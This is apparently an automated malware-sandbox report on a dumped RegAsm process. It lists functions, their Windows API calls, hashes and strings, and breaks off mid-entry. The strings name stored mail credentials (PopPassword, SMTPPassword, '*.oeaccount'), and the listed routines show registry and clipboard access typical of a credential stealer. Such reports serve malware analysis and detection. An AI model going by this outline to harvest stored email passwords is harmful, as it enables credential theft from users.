                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                                                                                                                                                                                                • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                                                                                                                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                                                                                                                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                                                                                                                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                                                                                                                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                                                                                                                                • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: strlen$_strcmpimemset
                                                                                                                                                                                                • String ID: /stext
                                                                                                                                                                                                • API String ID: 520177685-3817206916
                                                                                                                                                                                                • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                                                                                                                                • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                                                                                                                                                • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                                                                                                                                                                                                • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 00402B44
                                                                                                                                                                                                  • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                                • RegCloseKey.ADVAPI32 ref: 00402BBD
                                                                                                                                                                                                  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                                  • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                                  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                                  • Part of subcall function 00402A9D: memset.MSVCRT ref: 00402ABC
                                                                                                                                                                                                  • Part of subcall function 00402A9D: RegCloseKey.ADVAPI32 ref: 00402B17
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Closememset$EnumOpenmemcpystrlen
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1880195650-0
                                                                                                                                                                                                • Opcode ID: 5347bd042121d238431eb3b74689eb21bcf5dbb0349685f5868c10f604f2f03d
                                                                                                                                                                                                • Instruction ID: a6739743e39ca8df578777331d88ee5d3d666d95225ddaf8fc8e93cdb73399e2
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5347bd042121d238431eb3b74689eb21bcf5dbb0349685f5868c10f604f2f03d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4811B975904109EFEB10DF95CD41ED9B77CEF20348F1004BAF988A2151EAB5AAC49B14
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                                                                                                • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                                                                                                                                                                                • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                                                                                                                                                  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                                  • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ByteCharMultiQueryValueWidememcpystrlen
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1208763047-0
                                                                                                                                                                                                • Opcode ID: 3f072e78ae8ff50dccfb82ea1f6cac8499066c39a16d5267ba4970c6d85a246b
                                                                                                                                                                                                • Instruction ID: 6870f833a154d6718f5b937b5a7666aa62b37853351f5b72213b77096f12c34b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f072e78ae8ff50dccfb82ea1f6cac8499066c39a16d5267ba4970c6d85a246b
                                                                                                                                                                                                • Instruction Fuzzy Hash: BE0162B2504209FEEB119BA09CC9DABBB6CEB14358F108277F605B51C1DA749E589A28
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 00402ABC
                                                                                                                                                                                                  • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                                • RegCloseKey.ADVAPI32 ref: 00402B17
                                                                                                                                                                                                  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                                  • Part of subcall function 00402A14: memset.MSVCRT ref: 00402A34
                                                                                                                                                                                                  • Part of subcall function 00402A14: RegCloseKey.KERNEL32 ref: 00402A95
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Closememset$EnumOpen
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1938129365-0
                                                                                                                                                                                                • Opcode ID: ff5bff4591526617d1ef2bbbe04e9814357c404b1ae9404dde4026702917bfc3
                                                                                                                                                                                                • Instruction ID: 075d2aef54253d1e507a5189515eddc1e36b9bc69c6417a4805569c48a28632c
                                                                                                                                                                                                • Opcode Fuzzy Hash: ff5bff4591526617d1ef2bbbe04e9814357c404b1ae9404dde4026702917bfc3
                                                                                                                                                                                                • Instruction Fuzzy Hash: E801ACB590010DAFEB20EF95CD85EEAB76CDF2434CF000076F544A1051FBB9AE989B64
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                                                                                                                                • LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Library$FreeLoad
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 534179979-0
                                                                                                                                                                                                • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                                                                                                                                • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                                                                                                                                                • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                                                                                                                                • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                                                                                                                                  • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                                                                                                                                  • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                                                                                                                                  • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 4165544737-0
                                                                                                                                                                                                • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                                                                                                • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Enum
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2928410991-0
                                                                                                                                                                                                • Opcode ID: c2d350ed5551c03cc907a7eb32ba1217be4922c2ffa8587e1fde7b1a80c71ac0
                                                                                                                                                                                                • Instruction ID: 8a3f31470ea8a8b3d952542b098f2abe59e4a6ac9f2d43bd6bb9c8582bf8d7d6
                                                                                                                                                                                                • Opcode Fuzzy Hash: c2d350ed5551c03cc907a7eb32ba1217be4922c2ffa8587e1fde7b1a80c71ac0
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4AD067B950010EFFDF01DFA0ED45DBE7BBDEB04208F008061BD15D2151D7719A15ABA4
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: QueryValue
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3660427363-0
                                                                                                                                                                                                • Opcode ID: 0efd375066d84b9126104ad8b8140e0b1f33649f9e97a4d5cf1c1528608a19b3
                                                                                                                                                                                                • Instruction ID: d2a128bda891c33a071a1d1ce147914e72007c559b7d4fbb3b047f84c0d4c772
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0efd375066d84b9126104ad8b8140e0b1f33649f9e97a4d5cf1c1528608a19b3
                                                                                                                                                                                                • Instruction Fuzzy Hash: 45D092B540020EFFDF018F81EC45EEE7BBDFB04348F104166BA05A6060E671AB55ABA4
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • ReadFile.KERNELBASE(00000000,?,004441E4,00000000,00000000), ref: 00407577
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                                                • Opcode ID: f65a168b1810926023e0ef961af8b8fe703345c76f3ebc05859e8d9c9091ddda
                                                                                                                                                                                                • Instruction ID: 410abe984f7b5dc679d26b2641a37aa2388815a2676dab069d7a0e9e19a31d2a
                                                                                                                                                                                                • Opcode Fuzzy Hash: f65a168b1810926023e0ef961af8b8fe703345c76f3ebc05859e8d9c9091ddda
                                                                                                                                                                                                • Instruction Fuzzy Hash: ECD0C93501020DFBDF01CF80DC06FDD7BBDEB05359F108054BA0095160C7759A10AB94
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                                                                • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                                                                                                • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                                                                                                • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                                                                                                • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                                                                                                • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                                                                • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                                                                                                                • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CloseFind
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1863332320-0
                                                                                                                                                                                                • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                                                                                                                • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                                                                                                                                                • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Open
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 71445658-0
                                                                                                                                                                                                • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                                                                                                                • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                                                                                                                                                                                • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                                                                                                                • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                                                                                                                • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                                                                                                                                                • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00407948: free.MSVCRT ref: 0040794B
                                                                                                                                                                                                  • Part of subcall function 00407948: free.MSVCRT ref: 00407953
                                                                                                                                                                                                • free.MSVCRT ref: 00407D7C
                                                                                                                                                                                                  • Part of subcall function 00407A1F: free.MSVCRT ref: 00407A2E
                                                                                                                                                                                                  • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                                                                                                                                                                                  • Part of subcall function 00406F30: memcpy.MSVCRT(00000000,00000000,?,00000000,?,004045BE,00000001,?,?,00000000,00401B21,?), ref: 00406F64
                                                                                                                                                                                                  • Part of subcall function 00406F30: free.MSVCRT ref: 00406F6D
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$mallocmemcpy
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3401966785-0
                                                                                                                                                                                                • Opcode ID: a1ae40bd3782b748071a2eaf40207b68e6d5397b3c2520726b72686718a28406
                                                                                                                                                                                                • Instruction ID: d7b0144154ef41658eb0158d6140425370aaa91bbe4ae82c15578abe9a627f9f
                                                                                                                                                                                                • Opcode Fuzzy Hash: a1ae40bd3782b748071a2eaf40207b68e6d5397b3c2520726b72686718a28406
                                                                                                                                                                                                • Instruction Fuzzy Hash: DF5148B5D0821AAFCB109F99D4809ADFBB1BF44314B24817BE950B7391C738BE45CB96
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                                  • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                                  • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                                                                                                                                  • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                                                                                • _mbscpy.MSVCRT(?,?), ref: 00402ECA
                                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,?), ref: 00402EDD
                                                                                                                                                                                                • _mbscpy.MSVCRT(?,?), ref: 00402F6A
                                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,?), ref: 00402F77
                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402FD1
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _mbscpy$QueryValue$CloseOpen
                                                                                                                                                                                                • String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
                                                                                                                                                                                                • API String ID: 52435246-1534328989
                                                                                                                                                                                                • Opcode ID: 12cd8b5aae31976545c709c40371195406968ac39575e2cfa7706d38b8864041
                                                                                                                                                                                                • Instruction ID: 5dbeba4814e3302d002d767d8bad135afcd275429644e03c8fd50da481ddfc04
                                                                                                                                                                                                • Opcode Fuzzy Hash: 12cd8b5aae31976545c709c40371195406968ac39575e2cfa7706d38b8864041
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C512DB1900218BAEB51EB51CD46FDEB77CEF04744F1481A7B908A6191DBB89B84CF98
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • EmptyClipboard.USER32 ref: 00406E06
                                                                                                                                                                                                  • Part of subcall function 00406D01: CreateFileA.KERNELBASE(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00406E23
                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00002000,00000001), ref: 00406E34
                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00406E41
                                                                                                                                                                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406E54
                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00406E63
                                                                                                                                                                                                • SetClipboardData.USER32(00000001,00000000), ref: 00406E6C
                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00406E74
                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00406E80
                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00406E8B
                                                                                                                                                                                                • CloseClipboard.USER32 ref: 00406E94
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3604893535-0
                                                                                                                                                                                                • Opcode ID: 39ded4ddef3cc4279da07cdcd0aea708266a9fb2ccc9a22b6ca55318489a3f76
                                                                                                                                                                                                • Instruction ID: a08a85c5be877f1b118c2cb4fdaf5607b5944e2b5e0e57495ee86e8d77b21b2f
